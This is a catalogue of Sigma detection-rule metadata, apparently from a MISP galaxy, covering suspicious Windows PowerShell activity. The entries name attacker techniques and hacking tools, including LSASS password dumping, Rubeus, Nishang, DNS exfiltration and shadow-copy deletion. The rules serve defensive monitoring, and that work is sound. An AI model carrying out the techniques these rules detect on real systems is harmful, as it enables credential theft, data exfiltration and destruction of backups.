tags ['attack.credential_access', 'attack.t1003']

Troubleshooting Pack Cmdlet Execution

Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190, or actions similar to the "msdt" LOLBIN (as described in LOLBAS).

Internal MISP references

UUID 03409c93-a7c7-49ba-9a4c-a00badf2a153 which can be used as unique global reference for Troubleshooting Pack Cmdlet Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/21
falsepositive ['Legitimate usage of "TroubleshootingPack" cmdlet for troubleshooting purposes']
filename posh_ps_susp_follina_execution.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']

Active Directory Computers Enumeration With Get-AdComputer

Detects usage of the "Get-AdComputer" cmdlet to enumerate computers or their properties within Active Directory.

Internal MISP references

UUID 36bed6b2-e9a0-4fff-beeb-413a92b86138 which can be used as unique global reference for Active Directory Computers Enumeration With Get-AdComputer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Unknown']
filename posh_ps_get_adcomputer.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1018', 'attack.t1087.002']

Detected Windows Software Discovery - PowerShell

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.

Internal MISP references

UUID 2650dd1a-eb2a-412d-ac36-83f06c4f2282 which can be used as unique global reference for Detected Windows Software Discovery - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/16
falsepositive ['Legitimate administration activities']
filename posh_ps_software_discovery.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1518']

Invoke-Obfuscation Via Use Clip - Powershell

Detects obfuscated PowerShell that uses Clip.exe in scripts.

Internal MISP references

UUID db92dd33-a3ad-49cf-8c2c-608c3e30ace0 which can be used as unique global reference for Invoke-Obfuscation Via Use Clip - Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_use_clip.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Suspicious Connection to Remote Account

Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism.

Internal MISP references

UUID 1883444f-084b-419b-ac62-e0d0c5b3693f which can be used as unique global reference for Suspicious Connection to Remote Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/27
falsepositive ['Unknown']
filename posh_ps_susp_networkcredential.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1110.001']

Suspicious Mount-DiskImage

Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.

Internal MISP references

UUID 29e1c216-6408-489d-8a06-ee9d151ef819 which can be used as unique global reference for Suspicious Mount-DiskImage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/01
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_mount_diskimage.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.005']

Potential Suspicious PowerShell Keywords

Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework.

Internal MISP references

UUID 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf which can be used as unique global reference for Potential Suspicious PowerShell Keywords in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)
creation_date 2019/02/11
falsepositive ['Unknown']
filename posh_ps_susp_keywords.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Recon Information for Export with PowerShell

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

Internal MISP references

UUID a9723fcc-881c-424c-8709-fd61442ab3c3 which can be used as unique global reference for Recon Information for Export with PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/30
falsepositive ['Unknown']
filename posh_ps_susp_recon_export.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.t1119']

Potential Suspicious Windows Feature Enabled

Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature", used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.

Internal MISP references

UUID 55c925c1-7195-426b-a136-a9396800e29b which can be used as unique global reference for Potential Suspicious Windows Feature Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/10
falsepositive ['Legitimate usage of the features listed in the rule.']
filename posh_ps_enable_susp_windows_optional_feature.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion']

Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy

Detects PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.

Internal MISP references

UUID bbb9495b-58fc-4016-b9df-9a3a1b67ca82 which can be used as unique global reference for Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_get_addefaultdomainpasswordpolicy.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1201']

Suspicious Start-Process PassThru

Detects PowerShell use of the Start-Process PassThru option to start a process in the background.

Internal MISP references

UUID 0718cd72-f316-4aa2-988f-838ea8533277 which can be used as unique global reference for Suspicious Start-Process PassThru in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/15
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_start_process.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']

Remove Account From Domain Admin Group

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.

Internal MISP references

UUID 48a45d45-8112-416b-8a67-46e03a4b2107 which can be used as unique global reference for Remove Account From Domain Admin Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/26
falsepositive ['Unknown']
filename posh_ps_susp_remove_adgroupmember.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.impact', 'attack.t1531']

PowerShell Deleted Mounted Share

Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

Internal MISP references

UUID 66a4d409-451b-4151-94f4-a55d559c49b0 which can be used as unique global reference for PowerShell Deleted Mounted Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, @redcanary, Zach Stanford @svch0st
creation_date 2020/10/08
falsepositive ['Administrators or Power users may remove their shares via cmd line']
filename posh_ps_susp_mounted_share_deletion.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.005']

Suspicious TCP Tunnel Via PowerShell Script

Detects PowerShell scripts that create sockets/listeners, which could be indicative of tunneling activity.

Internal MISP references

UUID bd33d2aa-497e-4651-9893-5c5364646595 which can be used as unique global reference for Suspicious TCP Tunnel Via PowerShell Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/08
falsepositive ['Unknown']
filename posh_ps_susp_proxy_scripts.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090']

PowerShell ShellCode

Detects Base64-encoded shellcode.

Internal MISP references

UUID 16b37b70-6fcf-4814-a092-c36bd3aafcbd which can be used as unique global reference for PowerShell ShellCode in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author David Ledbetter (shellcode), Florian Roth (Nextron Systems)
creation_date 2018/11/17
falsepositive ['Unknown']
filename posh_ps_shellcode_b64.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055', 'attack.execution', 'attack.t1059.001']

Suspicious Get Local Groups Information - PowerShell

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Internal MISP references

UUID fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb which can be used as unique global reference for Suspicious Get Local Groups Information - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/12
falsepositive ['Unknown']
filename posh_ps_susp_local_group_reco.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']

Zip A Folder With PowerShell For Staging In Temp - PowerShell Script

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Internal MISP references

UUID b7a3c9a3-09ea-4934-8864-6a32cacd98d9 which can be used as unique global reference for Zip A Folder With PowerShell For Staging In Temp - PowerShell Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2021/07/20
falsepositive ['Unknown']
filename posh_ps_susp_zip_compress.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.t1074.001']

Potential Keylogger Activity

Detects PowerShell scripts that contain references to keystroke-capturing functions.

Internal MISP references

UUID 965e2db9-eddb-4cf6-a986-7a967df651e4 which can be used as unique global reference for Potential Keylogger Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/04
falsepositive ['Unknown']
filename posh_ps_susp_keylogger_activity.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.credential_access', 'attack.t1056.001']

Suspicious Process Discovery With Get-Process

Detects use of Get-Process to list the processes that are running on the local computer.

Internal MISP references

UUID af4c87ce-bdda-4215-b998-15220772e993 which can be used as unique global reference for Suspicious Process Discovery With Get-Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_get_process.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1057']

Clear PowerShell History - PowerShell

Detects keywords that could indicate clearing of the PowerShell history.

Internal MISP references

UUID 26b692dc-1722-49b2-b496-a8258aa6371d which can be used as unique global reference for Clear PowerShell History - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
creation_date 2022/01/25
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_clear_powershell_history.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.003']

Active Directory Group Enumeration With Get-AdGroup

Detects usage of the "Get-AdGroup" cmdlet to enumerate groups within Active Directory.

Internal MISP references

UUID 8c3a6607-b7dc-4f0d-a646-ef38c00b76ee which can be used as unique global reference for Active Directory Group Enumeration With Get-AdGroup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Unknown']
filename posh_ps_get_adgroup.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1069.002']

Potential COM Objects Download Cradles Usage - PS Script

Detects usage, by CLSID, of COM objects that can be abused to download files in PowerShell.

Internal MISP references

UUID 3c7d1587-3b13-439f-9941-7d14313dbdfe which can be used as unique global reference for Potential COM Objects Download Cradles Usage - PS Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/25
falsepositive ['Legitimate use of the library']
filename posh_ps_download_com_cradles.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

Malicious PowerShell Commandlets - ScriptBlock

Detects commandlet names from well-known PowerShell exploitation frameworks.

Internal MISP references

UUID 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 which can be used as unique global reference for Malicious PowerShell Commandlets - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer
creation_date 2017/03/05
falsepositive ['Unknown']
filename posh_ps_malicious_commandlets.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.discovery', 'attack.t1482', 'attack.t1087', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1069.001', 'attack.t1069.002', 'attack.t1069', 'attack.t1059.001']

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell

Detects obfuscated PowerShell produced by the VAR++ LAUNCHER technique.

Internal MISP references

UUID e54f5149-6ba3-49cf-b153-070d24679126 which can be used as unique global reference for Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_var.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Clearing Windows Console History

Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.

Internal MISP references

UUID bde47d4b-9987-405c-94c7-b080410e8ea7 which can be used as unique global reference for Clearing Windows Console History in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/25
falsepositive ['Unknown']
filename posh_ps_clearing_windows_console_history.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.t1070.003']

HackTool - Rubeus Execution - ScriptBlock

Detects the execution of the hacktool Rubeus using specific command line flags.

Internal MISP references

UUID 3245cd30-e015-40ff-a31d-5cadd5f377ec which can be used as unique global reference for HackTool - Rubeus Execution - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2023/04/27
falsepositive ['Unlikely']
filename posh_ps_hktl_rubeus.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1003', 'attack.t1558.003', 'attack.lateral_movement', 'attack.t1550.003']

Powershell XML Execute Command

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code.

Internal MISP references

UUID 6c6c6282-7671-4fe9-a0ce-a2dcebdc342b which can be used as unique global reference for Powershell XML Execute Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/19
falsepositive ['Legitimate administrative script']
filename posh_ps_xml_iex.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Suspicious PowerShell Invocations - Specific

Detects suspicious PowerShell invocation command parameters.

Internal MISP references

UUID ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 which can be used as unique global reference for Suspicious PowerShell Invocations - Specific in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro
creation_date 2017/03/05
falsepositive ['Unknown']
filename posh_ps_susp_invocation_specific.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Windows Defender Exclusions Added - PowerShell

Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions.

Internal MISP references

UUID c1344fa2-323b-4d2e-9176-84b4d4821c88 which can be used as unique global reference for Windows Defender Exclusions Added - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/16
falsepositive ['Unknown']
filename posh_ps_win_defender_exclusions_added.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562', 'attack.execution', 'attack.t1059']

Suspicious X509Enrollment - Ps Script

Detects use of X509Enrollment.

Internal MISP references

UUID 504d63cb-0dba-4d02-8531-e72981aace2c which can be used as unique global reference for Suspicious X509Enrollment - Ps Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/23
falsepositive ['Legitimate administrative script']
filename posh_ps_x509enrollment.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.004']

Malicious Nishang PowerShell Commandlets

Detects commandlet names and arguments from the Nishang exploitation framework.

Internal MISP references

UUID f772cee9-b7c2-4cb2-8f07-49870adc02e0 which can be used as unique global reference for Malicious Nishang PowerShell Commandlets in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alec Costello
creation_date 2019/05/16
falsepositive ['Unknown']
filename posh_ps_nishang_malicious_commandlets.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Suspicious GetTypeFromCLSID ShellExecute

Detects suspicious PowerShell code that executes COM objects.

Internal MISP references

UUID 8bc063d5-3a3a-4f01-a140-bc15e55e8437 which can be used as unique global reference for Suspicious GetTypeFromCLSID ShellExecute in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/02
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_gettypefromclsid.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1546.015']

WMImplant Hack Tool

Detects parameters used by WMImplant.

Internal MISP references

UUID 8028c2c3-e25a-46e3-827f-bbb5abf181d7 which can be used as unique global reference for WMImplant Hack Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020/03/26
falsepositive ['Administrative scripts that use the same keywords.']
filename posh_ps_wmimplant.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.t1059.001']

Registry-Free Process Scope COR_PROFILER

Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (that is, external to .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) (Citation: Microsoft COR_PROFILER Feb 2013)

Internal MISP references

UUID 23590215-4702-4a70-8805-8dc9e58314a2 which can be used as unique global reference for Registry-Free Process Scope COR_PROFILER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Legitimate administrative script']
filename posh_ps_cor_profiler.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1574.012']

Powershell DNSExfiltration

DNSExfiltrator allows transferring (exfiltrating) a file over a DNS request covert channel

Internal MISP references

UUID d59d7842-9a21-4bc6-ba98-64bfe0091355 which can be used as unique global reference for Powershell DNSExfiltration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['Legitimate script']
filename posh_ps_invoke_dnsexfiltration.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048']

Invoke-Obfuscation Via Use MSHTA - PowerShell

Detects obfuscated PowerShell that uses MSHTA in scripts

Internal MISP references

UUID e55a5195-4724-480e-a77e-3ebe64bd3759 which can be used as unique global reference for Invoke-Obfuscation Via Use MSHTA - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/08
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_use_mhsta.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Potential Persistence Via Security Descriptors - ScriptBlock

Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.

Internal MISP references

UUID 2f77047c-e6e9-4c11-b088-a3de399524cd which can be used as unique global reference for Potential Persistence Via Security Descriptors - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/05
falsepositive ['Unknown']
filename posh_ps_susp_ace_tampering.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation']

Powershell WMI Persistence

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.

Internal MISP references

UUID 9e07f6e7-83aa-45c6-998e-0af26efd0a85 which can be used as unique global reference for Powershell WMI Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/08/19
falsepositive ['Unknown']
filename posh_ps_wmi_persistence.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1546.003']

Code Executed Via Office Add-in XLL File

Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs.

Internal MISP references

UUID 36fbec91-fa1b-4d5d-8df1-8d8edcb632ad which can be used as unique global reference for Code Executed Via Office Add-in XLL File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Unknown']
filename posh_ps_office_comobject_registerxll.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1137.006']

Powershell Directory Enumeration

Detects a technique used by MAZE ransomware to enumerate directories using PowerShell

Internal MISP references

UUID 162e69a7-7981-4344-84a9-0f1c9a217a52 which can be used as unique global reference for Powershell Directory Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_directory_enum.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1083']

Automated Collection Bookmarks Using Get-ChildItem PowerShell

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

Internal MISP references

UUID e0565f5d-d420-4e02-8a68-ac00d864f9cf which can be used as unique global reference for Automated Collection Bookmarks Using Get-ChildItem PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/13
falsepositive ['Unknown']
filename posh_ps_get_childitem_bookmarks.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1217']

Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script

Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

Internal MISP references

UUID c1337eb8-921a-4b59-855b-4ba188ddcc42 which can be used as unique global reference for Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch
creation_date 2022/09/20
falsepositive ['Unknown']
filename posh_ps_susp_win32_shadowcopy_deletion.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.impact', 'attack.t1490']

Invoke-Obfuscation CLIP+ Launcher - PowerShell

Detects obfuscated use of Clip.exe to execute PowerShell

Internal MISP references

UUID 73e67340-0d25-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation CLIP+ Launcher - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_clip.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

PowerShell Get-Process LSASS in ScriptBlock

Detects a Get-Process command on the lsass process, which is in almost all cases a sign of malicious activity

Internal MISP references

UUID 84c174ab-d3ef-481f-9c86-a50d0b8e3edb which can be used as unique global reference for PowerShell Get-Process LSASS in ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/04/23
falsepositive ['Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)']
filename posh_ps_susp_getprocess_lsass.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

Suspicious IO.FileStream

Opens a handle on the drive volume via the \\.\ DOS device path specifier and performs a direct-access read of the first few bytes of the volume.

Internal MISP references

UUID 70ad982f-67c8-40e0-a955-b920c2fa05cb which can be used as unique global reference for Suspicious IO.FileStream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/09
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_iofilestream.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.003']

Invoke-Obfuscation Via Stdin - Powershell

Detects obfuscated PowerShell passed via stdin in scripts

Internal MISP references

UUID 86b896ba-ffa1-4fea-83e3-ee28a4c915c7 which can be used as unique global reference for Invoke-Obfuscation Via Stdin - Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_stdin.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript

Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script

Internal MISP references

UUID e2812b49-bae0-4b21-b366-7c142eafcde2 which can be used as unique global reference for Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/13
falsepositive ['Legitimate administration and backup scripts']
filename posh_ps_win32_nteventlogfile_usage.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion']

PowerShell Script With File Upload Capabilities

Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method.

Internal MISP references

UUID d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb which can be used as unique global reference for PowerShell Script With File Upload Capabilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['Unknown']
filename posh_ps_script_with_upload_capabilities.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration', 'attack.t1020']

Root Certificate Installed - PowerShell

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

Internal MISP references

UUID 42821614-9264-4761-acfc-5772c3286f76 which can be used as unique global reference for Root Certificate Installed - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, @redcanary, Zach Stanford @svch0st
creation_date 2020/10/10
falsepositive ["Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP"]
filename posh_ps_root_certificate_installed.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.004']

Potential Defense Evasion Via Raw Disk Access By Uncommon Tools

Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts

Internal MISP references

UUID db809f10-56ce-4420-8c86-d6a7d793c79c which can be used as unique global reference for Potential Defense Evasion Via Raw Disk Access By Uncommon Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019/10/22
falsepositive ['Likely']
filename raw_access_thread_susp_disk_access_using_uncommon_tools.yml
level low
logsource.category raw_access_thread
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1006']

Password Dumper Remote Thread in LSASS

Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.

Internal MISP references

UUID f239b326-2f41-4d6b-9dfa-c846a60ef505 which can be used as unique global reference for Password Dumper Remote Thread in LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/02/19
falsepositive ['Antivirus products']
filename create_remote_thread_win_susp_password_dumper_lsass.yml
level high
logsource.category create_remote_thread
logsource.product windows
